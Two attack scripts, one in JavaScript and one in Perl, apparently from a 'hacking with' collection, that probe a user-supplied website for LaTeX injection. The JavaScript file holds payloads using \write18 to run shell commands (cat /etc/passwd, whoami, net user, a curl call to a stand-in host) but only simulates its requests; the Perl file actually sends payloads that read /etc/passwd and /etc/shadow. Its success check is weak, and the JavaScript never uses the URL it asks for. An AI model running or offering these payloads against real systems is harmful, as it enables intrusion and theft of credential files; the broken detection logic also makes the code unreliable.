File: hacking_with_javascript/LaTex.js
const readline = require('readline');

// Function to check if the target website is vulnerable to LaTeX injection
async function checkForLaTeXInjection(targetUrl) {
    try {
        // Define LaTeX payloads for collecting sensitive information
        const payloads = [
            '\\documentclass{article}\\begin{document}\\immediate\\write18{curl "https://example.com/sensitive_data"}\\end{document}',
            '\\documentclass{article}\\begin{document}\\immediate\\write18{cat /etc/passwd}\\end{document}',
            '\\documentclass{article}\\begin{document}\\immediate\\write18{ls -la /home}\\end{document}',
            '\\documentclass{article}\\begin{document}\\immediate\\write18{net user}\\end{document}',
            '\\documentclass{article}\\begin{document}\\immediate\\write18{whoami}\\end{document}'
            // Add more payloads as needed to collect other sensitive information
        ];

        // Iterate through payloads and send requests
        for (const payload of payloads) {
            console.log(`Testing payload: ${payload}`);
            // Simulate fetch request, as fetch is not available in Node.js
            const responseBody = "<Response from server>"; // Replace with actual response in Node.js

            // Highlight sensitive information
            const sensitiveInfoRegex = /sensitive_data|root|password|etc\/passwd|net user|whoami/i;
            const sensitiveInfoFound = responseBody.match(sensitiveInfoRegex);

            // Log the result
            if (sensitiveInfoFound) {
                console.log(`Sensitive information found in the response:`);
                console.log(responseBody.replace(sensitiveInfoRegex, (match) => `\x1b[31m${match}\x1b[0m`));
            } else {
                console.log(`No sensitive information found in the response.`);
            }
        }
    } catch (error) {
        console.error('Error occurred while testing for LaTeX injection:', error);
    }
}

// Create readline interface
const rl = readline.createInterface({
    input: process.stdin,
    output: process.stdout
});

// Prompt the user for the target website URL
rl.question("Enter your target website URL: ", (targetUrl) => {
    rl.close();
    if (targetUrl) {
        console.log(`Testing target website: ${targetUrl}`);
        checkForLaTeXInjection(targetUrl);
    } else {
        console.log("No target URL provided. Please provide a valid URL.");
    }
});

File: hacking_with_perl/LaTex.pl
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use Term::ANSIColor;

# Function to send GET request
sub send_request {
    my $url = shift;
    my $ua  = LWP::UserAgent->new;
    my $res = $ua->get($url);
    return $res->content if $res->is_success;
    return;
}

# Function to check for vulnerability and sensitive information
sub check_vulnerability {
    my $url       = shift;
    my @payloads  = (
        '\documentclass{article}\begin{document}\input{../etc/passwd}\end{document}',
        '\documentclass{article}\begin{document}\input{../etc/shadow}\end{document}',
        '\documentclass{article}\begin{document}\input{/etc/passwd}\end{document}',
        '\documentclass{article}\begin{document}\input{/etc/shadow}\end{document}',
        # Add more payloads here
    );

    print "Testing for LaTeX Injection vulnerability on $url...\n";
    print "Please wait...\n";

    my $vulnerable = 0;
    my $response   = '';

    foreach my $payload (@payloads) {
        print "Trying payload: $payload\n";
        my $injection_url = $url . "?payload=" . $payload;
        my $response      = send_request($injection_url);

        if ($response && $response =~ /LaTeX/ && $response =~ /Injection/) {
            $vulnerable = 1;
            print color('bold red'), "The target website is vulnerable to LaTeX Injection!\n", color('reset');
            print color('bold blue'), "Successfully executed payload: $payload\n", color('reset');
            # Highlight sensitive information in the response
            $response =~ s/(\/etc\/passwd|\/etc\/shadow)/\e[1;31m$1\e[0m/g; # Highlight sensitive paths
            print "Response content:\n$response\n";
            last; # Stop checking other payloads if one is successful
        }
    }

    unless ($vulnerable) {
        print color('bold green'), "The target website is not vulnerable to LaTeX Injection.\n", color('reset');
    }
}

# Main program
sub main {
    print color('bold green'), "Enter your target website URL: ", color('reset');
    my $target_url = <STDIN>;
    chomp $target_url;

    check_vulnerability($target_url);
}

main();
